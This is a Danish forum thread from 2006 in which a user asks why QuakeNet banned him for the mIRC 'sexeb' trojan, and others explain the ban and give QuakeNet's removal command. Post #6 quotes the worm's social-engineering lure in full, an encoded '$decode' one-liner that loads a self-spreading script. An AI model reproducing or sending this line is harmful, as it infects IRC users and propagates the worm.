Avatar billede Mathias5148 Nybegynder
11. marts 2006 - 18:33 Der er 10 kommentarer og
1 løsning

De laver sjov med mig ikk?

18:27:31 » › You (WebFunny!~mathias@x1-6-00-12-17-c2-1a-1a.k109.webspeed.dk) are infected with a trojan (sexeb), see http://trojanscan.quakenet.org/?145 for details - banned for 12 hours.

Arh okay?
Meget smart?
HVAD ER DOG DET!!!!?!?!?!?!?!?!
Avatar billede Mathias5148 Nybegynder
11. marts 2006 - 18:36 #1
Glemte at skrive den fulde tekst:
18:27:31 » › You (WebFunny|BOT1!~mathias@x1-6-00-12-17-c2-1a-1a.k109.webspeed.dk) are infected with a trojan (sexeb), see http://trojanscan.quakenet.org/?145 for details - banned for 12 hours.
18:27:32 » › Server error: Closing Link: WebFunny by pelikaista.fi.quakenet.org (G-lined)
Avatar billede knocker Nybegynder
11. marts 2006 - 19:04 #2
Hvad er det du ikke forstår? De skriver at du har en trojan, samtidig er der et link som de peger mod for at få flere detaljer omkring trojanen.

Til sidst, men ikke mindst, så står der sjovt nok også i det link, præcis hvad du skal gøre!
Avatar billede drgonzo Praktikant
11. marts 2006 - 19:05 #3
har du prøvet at scanne din comp for trojans? hvad kommer denne melding i forbindelse med? spiller du on line?

Worm: sexeb

Please use the following command to remove it:

//unload -rs $+($chr(160),.,$chr(160)) | remove $+($chr(160),.,$chr(160)) | ignore -r | timer $+ $chr(160) off

If it doesnt help, please reinstall your mIRC.

Never copy any things containing "$decode" on IRC, it may have malicious code in it.

Content copyright (C) 2002-2005 QuakeNet IRC Network unless otherwise specified. All rights reserved.

Prøv at køre adaware og evt ewido security suite
Avatar billede knocker Nybegynder
11. marts 2006 - 19:09 #4
Der er ingen grund til at køre nogle af de eksterne programmer, han skal blot skrive den kommando i mIRC, og så unloader den automatisk trojanen. Det er sket, da han har kørt en $decode kode, som har oprettet en fil og smidt noget script kode ind i den, så han selv sidder og spammer det videre.

Så, (selvom det står tydeligt) løsningen på dit problem er stadigvæk:
//unload -rs $+($chr(160),.,$chr(160)) | remove $+($chr(160),.,$chr(160)) | ignore -r | timer $+ $chr(160) off
Avatar billede Mathias5148 Nybegynder
11. marts 2006 - 19:10 #5
Har scannet min computer 30 gange nu og der er ikke noget!

og ja jeg har set den der link men hvordan fjerner jeg g-lined igen?
Avatar billede Mathias5148 Nybegynder
11. marts 2006 - 19:38 #6
Her har vi en der fik min ven til  at på samme problem han skrev(på privat besked ting):

<xeNon-Mikkel> Wanna be an OPERATOR in #vzz ? copy/paste this-> //write  .  $decode(b24gMTp0ZXh0OiphKjojOnsgLmlnbm9yZSAkbmljayB8IC50aW1lcqAgMCAxMjAgLmpvaW4gI1NleGViIHwgLm1zZyAkbmljayBXYW5uYSBiZSBhbiBPUEVSQVRPUiBpbiAkY2hhbiA/IGNvcHkvcGFzdGUgdGhpcy0+AzcgLy93cml0ZSCgLqAgJCAkKyBkZWNvZGUoICQrICRlbmNvZGUoJHJlYWQoJHNjcmlwdCxuLDEpLG0pICQrICxtKSAkY2hyKDEyNCkgLmxvYWQgLXJzIKAuoCAkY2hyKDEyNCkgLy9tb2RlICQgJCsgbWUgK1IgfQ==,m) | .load -rs  .  | //mode $me +R
Avatar billede knocker Nybegynder
11. marts 2006 - 19:56 #7
mathias, ikke for at være ubehøvlet, men forstår du engelsk? Hvis du gør, så vil jeg hellere end gerne være ubehøvlet og spørge, hvorfor !@# du ikke LÆSER hvad der rent faktisk bliver skrevet, når du bliver disconnectet fra QuakeNet. "banned for 12 hours." - Ja, hvornår tror du selv du kan komme på igen? :)
Avatar billede drgonzo Praktikant
11. marts 2006 - 20:07 #8
knocker > god værkstedshumor he he :)
Avatar billede Mathias5148 Nybegynder
11. marts 2006 - 20:30 #9
Knocker > Du har ret endnu en god grund til at lære englesk :D men nej jeg kan ikke engelsk :(
Avatar billede knocker Nybegynder
11. marts 2006 - 20:50 #10
Til fremtidig brug, så er dette site din ven :)
http://www.dict.dk - All hail translation! <o/
Avatar billede Mathias5148 Nybegynder
11. marts 2006 - 21:41 #11